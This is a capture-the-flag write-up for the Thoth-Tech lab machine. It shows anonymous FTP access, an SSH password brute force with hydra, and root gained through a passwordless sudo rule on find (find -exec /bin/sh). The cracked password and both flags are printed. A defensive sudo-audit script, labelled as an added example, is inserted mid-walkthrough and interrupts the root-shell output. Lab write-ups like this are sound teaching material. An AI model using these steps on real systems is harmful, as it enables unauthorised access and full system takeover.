Thoth-Tech writeup
Information gathering
nmap scan results:
Nmap scan report for 192.168.148.188
Host is up (0.00017s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:BB:A9:C9 (VMware)
Port 21 is open, so try an anonymous FTP login:
ftp> open 192.168.148.188
Connected to 192.168.148.188.
220 (vsFTPd 3.0.3)
Name (192.168.148.188:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 110 Jul 02 09:33 note.txt
226 Directory send OK.
There is a note.txt file on the FTP server; download it:
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (110 bytes).
226 Transfer complete.
110 bytes received in 0.02 secs (4.7113 kB/s)
View its contents:
root@kali:~# cat note.txt
Dear pwnlab,
My name is jake. Your password is very weak and easily crackable, I think change your password.
Exploitation
The note hints at a weak password, so brute-force the SSH login (hydra output below):
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.148.188:22/
[STATUS] 113.00 tries/min, 113 tries in 00:01h, 14344287 to do in 2115:41h, 16 active
[22][ssh] host: 192.168.148.188 login: pwnlab password: babygirl1
Log in over SSH as pwnlab@192.168.148.188.
The user.txt file is in the home directory:
pwnlab@thothtech:~$ cat user.txt
5ec2a44a73e7b259c6b0abc174291359
Privilege escalation
pwnlab@thothtech:~$ sudo -l
Matching Defaults entries for pwnlab on thothtech:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwnlab may run the following commands on thothtech:
(root) NOPASSWD: /usr/bin/find
find can be run as root via sudo without a password, so its -exec option gives a root shell directly:
sudo find user.txt -exec /bin/sh \; -quit
This yields a root shell.
Getting the flag
Look for the flag file:
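As an added example (not part of the original writeup), the following Python script audits `sudo -l` output like the one above from the defender's side: it parses the rule lines and flags passwordless root rules for binaries that can spawn a subprocess through their normal options, which is exactly what made `/usr/bin/find` a privilege-escalation path here. The `SHELL_CAPABLE` list and the sample text are assumptions constructed for this example.

```python
"""Audit `sudo -l` output for passwordless root rules on shell-capable binaries."""
import re

# Constructed sample, modelled on the writeup's `sudo -l` output.
SUDO_L_OUTPUT = """\
Matching Defaults entries for pwnlab on thothtech:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User pwnlab may run the following commands on thothtech:
    (root) NOPASSWD: /usr/bin/find
"""

# Assumption: utilities whose documented options run other programs
# (find -exec, vim :!, awk system(), ...). Extend for your environment.
SHELL_CAPABLE = {"find", "vim", "vi", "less", "more", "awk", "perl",
                 "python", "python3", "env", "bash", "sh"}

# "(runas) TAG: TAG: /path/cmd args, /other/cmd" -> runas, tags, command list
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def parse_rules(text):
    """Return the rule lines that follow the 'User ... may run' header."""
    rules, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True          # everything after this header is a rule
            continue
        if not in_cmds:
            continue                # skip the Defaults block
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            rules.append({"runas": m.group("runas").strip(),
                          "nopasswd": "NOPASSWD" in tags,
                          "cmd": cmd.strip()})
    return rules


def risky_rules(rules):
    """Rules that run as root, need no password, and name a shell-capable binary."""
    out = []
    for r in rules:
        binary = r["cmd"].split()[0].rsplit("/", 1)[-1]   # /usr/bin/find -> find
        runas_user = r["runas"].split(":")[0].strip()     # "(root)" or "(ALL : ALL)"
        if r["nopasswd"] and runas_user in ("root", "ALL") \
                and (r["cmd"] == "ALL" or binary in SHELL_CAPABLE):
            out.append(r)
    return out


if __name__ == "__main__":
    for r in risky_rules(parse_rules(SUDO_L_OUTPUT)):
        print(f"RISKY: ({r['runas']}) NOPASSWD: {r['cmd']}")
```

Feed it the real output of `sudo -l` (or a parsed /etc/sudoers) to spot passwordless rules that should be tightened or removed.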
# uid=0(root) gid=0(root) groups=0(root)
# ls
user.txt
# cd /root
# ls
root.txt snap
# ls -al
total 44
drwx------ 6 root root 4096 Nov 24 2021 .
drwxr-xr-x 20 root root 4096 Jun 28 18:32 ..
-rw------- 1 root root 14 Jul 2 09:38 .bash_history
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 Nov 24 2021 .cache
drwxr-xr-x 3 root root 4096 Jun 28 19:09 .local
-rw------- 1 root root 146 Jun 28 19:05 .mysql_history
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r--r-- 1 root root 57 Jul 2 08:51 root.txt
drwxr-xr-x 3 root root 4096 Jun 28 18:54 snap
drwx------ 2 root root 4096 Jun 28 18:53 .ssh
# cd snap
# ls
lxd
# cd ..
# ls
root.txt snap
# cat root.txt
Root flag: d51546d5bcf8e3856c7bff5d201f0df6
good job :)
#